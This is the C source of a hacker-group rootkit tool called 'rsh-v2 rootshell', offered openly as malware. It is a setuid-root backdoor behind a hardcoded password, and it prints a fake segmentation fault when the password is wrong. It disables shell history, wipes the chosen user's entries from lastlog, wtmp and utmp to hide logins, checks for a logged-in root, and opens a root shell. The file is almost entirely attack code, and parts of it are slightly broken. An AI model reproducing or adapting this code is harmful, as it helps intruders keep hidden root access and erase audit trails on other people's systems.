/* rsh-v2 rootshell by rotor http://www.c1zc0.com irc.efnet.org #c1zc0 usage: ./rshv2 */ #include #include #include #include #include #include #include #include #define PASS "c1zk0" #define _PATH_LASTLOG "/var/log/lastlog" #define _WTMP_PATH "/var/log/wtmp" #define _UTMP_PATH "/var/run/utmp" int clean_last(char *path, char *user); int wtmp_clean(char *path, char *user); void chkr(); int main(int argc, char **argv[]) { char *pass = argv[1]; char *pazz = PASS; struct utsname u; uname(&u); if(argc < 1){ printf("Segmentation fault (core dumped)\n"); exit(0); } if(strcmp(pass, pazz)) { printf("Segmentation fault (core dumped)\n"); exit(0); } else { setuid(0); setuid(0); unsetenv("PS1"); unsetenv("HISTFILE"); printf("Cleaning lastlog!\n"); clean_last(_PATH_LASTLOG, argv[2]); printf("Cleaning WTMP\n"); wtmp_clean(_WTMP_PATH, argv[2]); printf("Cleaning UTMP\n"); wtmp_clean(_UTMP_PATH, argv[2]); printf("Checking for root logged in\n"); chkr(); printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename); printf("Release: %s, Version: %s\n", u.release, u.version); execl("/bin/bash", "sh", NULL); } return 0; } int clean_last(char *path, char *user) { FILE *lastlog_file; struct passwd *pwd; struct lastlog lastlog_tmp; int count=0; if((lastlog_file = fopen(path, "r+")) == NULL) { printf("failed to open file %s\n", path); return 0; } if ((pwd = getpwnam(user)) == NULL) { printf("user %s not found\n", user); return 0; } fseek(lastlog_file, (long)(pwd->pw_uid*sizeof(lastlog_tmp)), SEEK_SET); bzero((char *)&lastlog_tmp, sizeof(lastlog_tmp)); fwrite((char *)&lastlog_tmp, sizeof(lastlog_tmp), 1, lastlog_file); fclose(lastlog_file); printf("%s cleaned!\n", path); } int wtmp_clean(char *path, char *user) { FILE *uwtmp_file; struct utmp uwtmp_tmp; int count=0; if((uwtmp_file = fopen(path, "r+")) == NULL) { printf("failed to open file %s\n", path); return 0; } while(fread((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file) > 0) { if(strcmp(uwtmp_tmp.ut_name, user) ==0) { fseek(uwtmp_file, -sizeof(uwtmp_tmp), SEEK_CUR); bzero(&uwtmp_tmp, sizeof(uwtmp_tmp)); fwrite((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file); count++; } } fclose(uwtmp_file); if(count == 0) { printf("user %s not found\n", user, path); } else printf("%s cleaned!\n", path); } void chkr() { struct utmp *entry; int logincount=0, rootcount=0; setutent(); while ((entry = getutent())!=NULL) { if(entry->ut_type != USER_PROCESS) continue; logincount++; if(!strcmp(entry->ut_user, "root")); { printf("Caution> root is logged in on %s!\n", entry->ut_line); rootcount++; } } printf("-> %d user(s) logged in, %d root login(s)\n", logincount, rootcount); endutent(); }